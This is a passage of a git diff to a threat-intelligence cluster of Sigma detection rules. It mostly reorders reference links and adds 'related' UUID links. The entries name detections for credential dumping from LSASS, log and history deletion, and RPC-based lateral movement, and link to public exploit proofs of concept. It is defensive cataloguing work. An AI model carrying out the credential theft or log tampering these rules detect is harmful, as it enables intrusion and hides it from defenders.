"estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "3fcc9b35-39e4-44c0-a2ad-9e82b6902b31", "value": "Commands to Clear or Remove the Syslog" }, @@ -65030,6 +83631,15 @@ "attack.t1059" ] }, + "related": [ + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "d292e0af-9a18-420c-9525-ec0ac3936892", "value": "Suspicious Java Children Processes" }, @@ -65078,6 +83688,15 @@ "attack.t1222.002" ] }, + "related": [ + { + "dest-uuid": "09b130a2-a77e-4af0-a361-f46f9aad1345", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "34979410-e4b5-4e5d-8cfb-389fdff05c12", "value": "Remove Immutable File Attribute" }, @@ -65107,6 +83726,29 @@ "attack.t1203" ] }, + "related": [ + { + "dest-uuid": "b21c3b2d-02e6-45b1-980b-e69051040839", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "be2dcee9-a7a7-4e38-afd6-21b31ecc3d63", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "21541900-27a9-4454-9c4c-3f0a4240344a", "value": "OMIGOD SCX RunAsProvider ExecuteShellCommand" }, @@ -65123,8 +83765,8 @@ "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ - "https://gtfobins.github.io/gtfobins/nohup/", "https://www.computerhope.com/unix/unohup.htm", + "https://gtfobins.github.io/gtfobins/nohup/", "https://en.wikipedia.org/wiki/Nohup", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_nohup.yml" ], @@ -65201,6 +83843,15 @@ "attack.t1090" ] }, + "related": [ + { + "dest-uuid": "731f4f55-b6d0-41d1-a7a9-072a66389aea", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "72f4ab3f-787d-495d-a55d-68c2ff46cf4c", "value": "Connection Proxy" }, @@ -65248,6 +83899,15 @@ "attack.t1070.004" ] }, + "related": [ + { + "dest-uuid": "d63a3fb8-9452-4e9d-a60a-54be68d5998c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "30aed7b6-d2c1-4eaf-9382-b6bc43e50c57", "value": "File Deletion" }, @@ -65264,8 +83924,8 @@ "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ - "https://research.splunk.com/endpoint/linux_doas_tool_execution/", "https://www.makeuseof.com/how-to-install-and-use-doas/", + "https://research.splunk.com/endpoint/linux_doas_tool_execution/", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_doas_execution.yml" ], "tags": [ @@ -65273,6 +83933,15 @@ "attack.t1548" ] }, + "related": [ + { + "dest-uuid": "67720091-eee3-4d2d-ae16-8264567f6f5b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "067d8238-7127-451c-a9ec-fa78045b618b", "value": "Linux Doas Tool Execution" }, @@ -65298,6 +83967,15 @@ "attack.t1565.001" ] }, + "related": [ + { + "dest-uuid": "1cfcb312-b8d7-47a4-b560-4b16cc677292", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "1182f3b3-e716-4efa-99ab-d2685d04360f", "value": "History File Deletion" }, @@ -65322,6 +84000,15 @@ "attack.t1592.004" ] }, + "related": [ + { + "dest-uuid": "774ad5bb-2366-4c13-a8a9-65e50b292e7c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "0f79c4d2-4e1f-4683-9c36-b5469a665e06", "value": "Cat Sudoers" }, @@ -65346,6 +84033,15 @@ "attack.t1593.003" ] }, + "related": [ + { + "dest-uuid": "70910fbd-58dc-4c1c-8c48-814d11fcd022", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "cfec9d29-64ec-4a0f-9ffe-0fdb856d5446", "value": "Suspicious Git Clone - Linux" }, @@ -65362,14 +84058,24 @@ "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1548.001/T1548.001.md", "https://attack.mitre.org/techniques/T1548/001/", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1548.001/T1548.001.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_setgid_setuid.yml" ], "tags": [ - "attack.persistence" + "attack.persistence", + "attack.t1548.001" ] }, + "related": [ + { + "dest-uuid": "6831414d-bb70-42b7-8030-d4e06b2660c9", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "c21c4eaa-ba2e-419a-92b2-8371703cbe21", "value": "Setuid and Setgid" }, @@ -65386,9 +84092,9 @@ "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ - "https://github.com/W01fh4cker/cve-2022-33891/blob/fd973b56e78bca8822caa3a2e3cf1b5aff5d0950/cve_2022_33891_poc.py", - "https://sumsec.me/2022/CVE-2022-33891%20Apache%20Spark%20shell%20command%20injection.html", "https://github.com/apache/spark/pull/36315/files", + "https://sumsec.me/2022/CVE-2022-33891%20Apache%20Spark%20shell%20command%20injection.html", + "https://github.com/W01fh4cker/cve-2022-33891/blob/fd973b56e78bca8822caa3a2e3cf1b5aff5d0950/cve_2022_33891_poc.py", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_cve_2022_33891_spark_shell_command_injection.yml" ], "tags": [ @@ -65397,6 +84103,15 @@ "cve.2022.33891" ] }, + "related": [ + { + "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "c8a5f584-cdc8-42cc-8cce-0398e4265de3", "value": "Apache Spark Shell Command Injection - ProcessCreation" }, @@ -65421,6 +84136,15 @@ "attack.t1069.001" ] }, + "related": [ + { + "dest-uuid": "a01bf75f-00b2-4568-a58f-565ff9bf202b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "676381a6-15ca-4d73-a9c8-6a22e970b90d", "value": "Local Groups Discovery - Linux" }, @@ -65437,8 +84161,8 @@ "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ - "https://www.configserverfirewall.com/ubuntu-linux/ubuntu-add-user-to-root-group/", "https://pberba.github.io/security/2021/11/23/linux-threat-hunting-for-persistence-account-creation-manipulation/", + "https://www.configserverfirewall.com/ubuntu-linux/ubuntu-add-user-to-root-group/", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_usermod_susp_group.yml" ], "tags": [ From fd226d47a27f09523f1301c33690c17af06f4271 Mon Sep 17 00:00:00 2001 From: Alexandre Dulaunoy Date: Thu, 12 Jan 2023 14:10:22 +0100 Subject: [PATCH 10/13] chg: [sigma] new version of the cluster --- clusters/sigma-rules.json | 2150 ++++++++++++++++++------------------- 1 file changed, 1075 insertions(+), 1075 deletions(-) diff --git a/clusters/sigma-rules.json b/clusters/sigma-rules.json index 9954344..504a13a 100644 --- a/clusters/sigma-rules.json +++ b/clusters/sigma-rules.json @@ -174,9 +174,9 @@ "logsource.category": "firewall", "logsource.product": "No established product", "refs": [ - "https://www.cisecurity.org/controls/cis-controls-list/", - "https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf", "https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf", + "https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf", + "https://www.cisecurity.org/controls/cis-controls-list/", "https://github.com/SigmaHQ/sigma/tree/master/rules/network/firewall/net_firewall_cleartext_protocols.yml" ], "tags": "No established tags" @@ -232,9 +232,9 @@ "logsource.category": "dns", "logsource.product": "No established product", "refs": [ + "https://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/", "https://blog.malwarebytes.com/threat-analysis/2016/11/telecrypt-the-ransomware-abusing-telegram-api-defeated/", "https://researchcenter.paloaltonetworks.com/2018/03/unit42-telerat-another-android-trojan-leveraging-telegrams-bot-api-to-target-iranian-users/", - "https://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/", "https://core.telegram.org/bots/faq", "https://github.com/SigmaHQ/sigma/tree/master/rules/network/dns/net_dns_susp_telegram_api.yml" ], @@ -310,8 +310,8 @@ "logsource.category": "dns", "logsource.product": "No established product", "refs": [ - "https://www.sekoia.io/en/hunting-and-detecting-cobalt-strike/", "https://www.icebrg.io/blog/footprints-of-fin7-tracking-actor-patterns", + "https://www.sekoia.io/en/hunting-and-detecting-cobalt-strike/", "https://github.com/SigmaHQ/sigma/tree/master/rules/network/dns/net_dns_mal_cobaltstrike.yml" ], "tags": [ @@ -417,8 +417,8 @@ "logsource.category": "dns", "logsource.product": "No established product", "refs": [ - "https://patrick-bareiss.com/detect-c2-traffic-over-dns-using-sigma/", "https://zeltser.com/c2-dns-tunneling/", + "https://patrick-bareiss.com/detect-c2-traffic-over-dns-using-sigma/", "https://github.com/SigmaHQ/sigma/tree/master/rules/network/dns/net_dns_c2_detection.yml" ], "tags": [ @@ -460,8 +460,8 @@ "logsource.category": "dns", "logsource.product": "No established product", "refs": [ - "https://github.com/samratashok/nishang/blob/414ee1104526d7057f9adaeee196d91ae447283e/Backdoors/DNS_TXT_Pwnage.ps1", "https://twitter.com/stvemillertime/status/1024707932447854592", + "https://github.com/samratashok/nishang/blob/414ee1104526d7057f9adaeee196d91ae447283e/Backdoors/DNS_TXT_Pwnage.ps1", "https://github.com/SigmaHQ/sigma/tree/master/rules/network/dns/net_dns_susp_txt_exec_strings.yml" ], "tags": [ @@ -1329,10 +1329,10 @@ "logsource.category": "No established category", "logsource.product": "zeek", "refs": [ - "https://github.com/topotam/PetitPotam/blob/d83ac8f2dd34654628c17490f99106eb128e7d1e/PetitPotam/PetitPotam.cpp", "https://threatpost.com/microsoft-petitpotam-poc/168163/", - "https://msrc.microsoft.com/update-guide/vulnerability/ADV210003", "https://vx-underground.org/archive/Symantec/windows-vista-network-attack-07-en.pdf", + "https://github.com/topotam/PetitPotam/blob/d83ac8f2dd34654628c17490f99106eb128e7d1e/PetitPotam/PetitPotam.cpp", + "https://msrc.microsoft.com/update-guide/vulnerability/ADV210003", "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_dce_rpc_potential_petit_potam_efs_rpc_call.yml" ], "tags": [ @@ -1700,9 +1700,9 @@ "logsource.category": "No established category", "logsource.product": "zeek", "refs": [ + "https://unit42.paloaltonetworks.com/manageengine-godzilla-nglite-kdcsponge/", "https://github.com/Maka8ka/NGLite", "https://github.com/nknorg/nkn-sdk-go", - "https://unit42.paloaltonetworks.com/manageengine-godzilla-nglite-kdcsponge/", "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_dns_nkn.yml" ], "tags": [ @@ -1751,8 +1751,8 @@ "logsource.product": "zeek", "refs": [ "https://posts.specterops.io/hunting-in-active-directory-unconstrained-delegation-forests-trusts-71f2b33688e1", - "https://twitter.com/_dirkjan/status/1309214379003588608", "https://dirkjanm.io/a-different-way-of-abusing-zerologon/", + "https://twitter.com/_dirkjan/status/1309214379003588608", "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_dce_rpc_smb_spoolss_named_pipe.yml" ], "tags": [ @@ -1843,11 +1843,11 @@ "logsource.category": "No established category", "logsource.product": "zeek", "refs": [ - "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-par/93d1915d-4d9f-4ceb-90a7-e8f2a59adc29", - "https://www.crowdstrike.com/blog/cve-2021-1678-printer-spooler-relay-security-advisory/", "https://old.zeek.org/zeekweek2019/slides/bzar.pdf", "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527", + "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-par/93d1915d-4d9f-4ceb-90a7-e8f2a59adc29", "https://github.com/zeek/zeek/blob/691b099de13649d6576c7b9d637f8213ff818832/scripts/base/protocols/dce-rpc/consts.zeek", + "https://www.crowdstrike.com/blog/cve-2021-1678-printer-spooler-relay-security-advisory/", "https://github.com/corelight/CVE-2021-1675", "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_dce_rpc_printnightmare_print_driver_install.yml" ], @@ -2148,10 +2148,10 @@ "logsource.category": "application", "logsource.product": "ruby_on_rails", "refs": [ - "http://guides.rubyonrails.org/action_controller_overview.html", - "https://stackoverflow.com/questions/25892194/does-rails-come-with-a-not-authorized-exception", "http://edgeguides.rubyonrails.org/security.html", "https://github.com/rails/rails/blob/cd08e6bcc4cd8948fe01e0be1ea0c7ca60373a25/actionpack/lib/action_dispatch/middleware/exception_wrapper.rb", + "https://stackoverflow.com/questions/25892194/does-rails-come-with-a-not-authorized-exception", + "http://guides.rubyonrails.org/action_controller_overview.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/ruby/appframework_ruby_on_rails_exceptions.yml" ], "tags": [ @@ -2184,10 +2184,10 @@ "logsource.category": "application", "logsource.product": "rpc_firewall", "refs": [ - "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", - "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-wkst/55118c55-2122-4ef9-8664-0c1ff9e168f3", - "https://github.com/zeronetworks/rpcfirewall", "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-WKST.md", + "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-wkst/55118c55-2122-4ef9-8664-0c1ff9e168f3", + "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", + "https://github.com/zeronetworks/rpcfirewall", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_sharphound_recon_account.yml" ], "tags": [ @@ -2211,10 +2211,10 @@ "logsource.category": "application", "logsource.product": "rpc_firewall", "refs": [ - "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rrp/0fa3191d-bb79-490a-81bd-54c2601b7a78", - "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-RRP.md", + "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", "https://github.com/zeronetworks/rpcfirewall", + "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-RRP.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_remote_registry_recon.yml" ], "tags": [ @@ -2237,8 +2237,8 @@ "logsource.category": "application", "logsource.product": "rpc_firewall", "refs": [ - "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931", + "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-TSCH.md", "https://github.com/zeronetworks/rpcfirewall", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_itaskschedulerservice_recon.yml" @@ -2263,9 +2263,9 @@ "logsource.category": "application", "logsource.product": "rpc_firewall", "refs": [ - "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-SCMR.md", "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-srvs/accf23b0-0f57-441c-9185-43041f1b0ee9", + "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-SCMR.md", "https://github.com/zeronetworks/rpcfirewall", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_remote_service_lateral_movement.yml" ], @@ -2299,8 +2299,8 @@ "logsource.category": "application", "logsource.product": "rpc_firewall", "refs": [ - "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931", + "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-TSCH.md", "https://github.com/zeronetworks/rpcfirewall", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_atsvc_lateral_movement.yml" @@ -2337,9 +2337,9 @@ "logsource.product": "rpc_firewall", "refs": [ "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", + "https://github.com/zeronetworks/rpcfirewall", "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-drsr/f977faaa-673e-4f66-b9bf-48c640241d47?redirectedfrom=MSDN", "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-DRSR.md", - "https://github.com/zeronetworks/rpcfirewall", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_dcsync_attack.yml" ], "tags": [ @@ -2387,8 +2387,8 @@ "logsource.category": "application", "logsource.product": "rpc_firewall", "refs": [ - "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931", + "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-TSCH.md", "https://github.com/zeronetworks/rpcfirewall", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_itaskschedulerservice_lateral_movement.yml" @@ -2424,8 +2424,8 @@ "logsource.category": "application", "logsource.product": "rpc_firewall", "refs": [ - "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-srvs/accf23b0-0f57-441c-9185-43041f1b0ee9", + "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", "https://github.com/zeronetworks/rpcfirewall", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_remote_dcom_or_wmi.yml" ], @@ -2467,8 +2467,8 @@ "logsource.category": "application", "logsource.product": "rpc_firewall", "refs": [ - "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931", + "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-TSCH.md", "https://github.com/zeronetworks/rpcfirewall", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_sasec_lateral_movement.yml" @@ -2504,12 +2504,12 @@ "logsource.category": "application", "logsource.product": "rpc_firewall", "refs": [ - "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-pan/e44d984c-07d3-414c-8ffc-f8c8ad8512a8", + "https://github.com/zeronetworks/rpcfirewall", "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527", "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", - "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-RPRN-PAR.md", "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/d42db7d5-f141-4466-8f47-0a4be14e2fc1", - "https://github.com/zeronetworks/rpcfirewall", + "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-RPRN-PAR.md", + "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-pan/e44d984c-07d3-414c-8ffc-f8c8ad8512a8", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_printing_lateral_movement.yml" ], "tags": [ @@ -2532,9 +2532,9 @@ "logsource.category": "application", "logsource.product": "rpc_firewall", "refs": [ - "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-srvs/02b1f559-fda2-4ba3-94c2-806eb2777183", "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-SRVS.md", + "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", "https://github.com/zeronetworks/rpcfirewall", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_sharphound_recon_sessions.yml" ], @@ -2558,9 +2558,9 @@ "logsource.category": "application", "logsource.product": "rpc_firewall", "refs": [ - "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36942", "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-EFSR.md", + "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", "https://github.com/zeronetworks/rpcfirewall", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_efs_abuse.yml" ], @@ -2584,8 +2584,8 @@ "logsource.category": "application", "logsource.product": "rpc_firewall", "refs": [ - "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931", + "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-TSCH.md", "https://github.com/zeronetworks/rpcfirewall", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_sasec_recon.yml" @@ -2610,10 +2610,10 @@ "logsource.category": "application", "logsource.product": "rpc_firewall", "refs": [ - "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rrp/0fa3191d-bb79-490a-81bd-54c2601b7a78", - "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-RRP.md", + "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", "https://github.com/zeronetworks/rpcfirewall", + "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-RRP.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_remote_registry_lateral_movement.yml" ], "tags": [ @@ -2637,9 +2637,9 @@ "logsource.category": "application", "logsource.product": "rpc_firewall", "refs": [ - "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-SRVS.md", "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-srvs/accf23b0-0f57-441c-9185-43041f1b0ee9", + "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", "https://github.com/zeronetworks/rpcfirewall", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_remote_server_service_abuse.yml" ], @@ -2663,9 +2663,9 @@ "logsource.category": "application", "logsource.product": "rpc_firewall", "refs": [ + "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931", "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-TSCH.md", - "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931", "https://github.com/zeronetworks/rpcfirewall", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_atsvc_recon.yml" ], @@ -2722,11 +2722,11 @@ "logsource.category": "process_access", "logsource.product": "windows", "refs": [ - "https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html", + "http://security-research.dyndns.org/pub/slides/FIRST2017/FIRST-2017_Tom-Ueltschi_Sysmon_FINAL_notes.pdf", + "https://docs.microsoft.com/en-us/windows/win32/procthread/process-security-and-access-rights", "https://onedrive.live.com/view.aspx?resid=D026B4699190F1E6!2843&ithint=file%2cpptx&app=PowerPoint&authkey=!AMvCRTKB_V1J5ow", "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", - "https://docs.microsoft.com/en-us/windows/win32/procthread/process-security-and-access-rights", - "http://security-research.dyndns.org/pub/slides/FIRST2017/FIRST-2017_Tom-Ueltschi_Sysmon_FINAL_notes.pdf", + "https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_susp_proc_access_lsass_susp_source.yml" ], "tags": [ @@ -2760,8 +2760,8 @@ "logsource.category": "process_access", "logsource.product": "windows", "refs": [ - "https://modexp.wordpress.com/2019/08/30/minidumpwritedump-via-com-services-dll/", "https://twitter.com/shantanukhande/status/1229348874298388484", + "https://modexp.wordpress.com/2019/08/30/minidumpwritedump-via-com-services-dll/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_lsass_dump_comsvcs_dll.yml" ], "tags": [ @@ -2941,9 +2941,9 @@ "logsource.category": "process_access", "logsource.product": "windows", "refs": [ + "https://www.ired.team/offensive-security/credential-access-and-credential-dumping/dump-credentials-from-lsass-process-without-mimikatz", "https://twitter.com/mrd0x/status/1460597833917251595", "https://twitter.com/_xpn_/status/1491557187168178176", - "https://www.ired.team/offensive-security/credential-access-and-credential-dumping/dump-credentials-from-lsass-process-without-mimikatz", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_lsass_memdump_evasion.yml" ], "tags": [ @@ -3188,10 +3188,10 @@ "logsource.category": "process_access", "logsource.product": "windows", "refs": [ - "https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.001/T1003.001.md", - "https://research.splunk.com/endpoint/windows_possible_credential_dumping/", "https://blog.menasec.net/2019/02/threat-hunting-21-procdump-or-taskmgr.html", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.001/T1003.001.md", + "https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html", + "https://research.splunk.com/endpoint/windows_possible_credential_dumping/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_lsass_memdump.yml" ], "tags": [ @@ -3225,10 +3225,10 @@ "logsource.category": "process_access", "logsource.product": "windows", "refs": [ - "https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html", + "http://security-research.dyndns.org/pub/slides/FIRST2017/FIRST-2017_Tom-Ueltschi_Sysmon_FINAL_notes.pdf", "https://onedrive.live.com/view.aspx?resid=D026B4699190F1E6!2843&ithint=file%2cpptx&app=PowerPoint&authkey=!AMvCRTKB_V1J5ow", "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", - "http://security-research.dyndns.org/pub/slides/FIRST2017/FIRST-2017_Tom-Ueltschi_Sysmon_FINAL_notes.pdf", + "https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_cred_dump_lsass_access.yml" ], "tags": [ @@ -3263,11 +3263,11 @@ "logsource.category": "process_access", "logsource.product": "windows", "refs": [ - 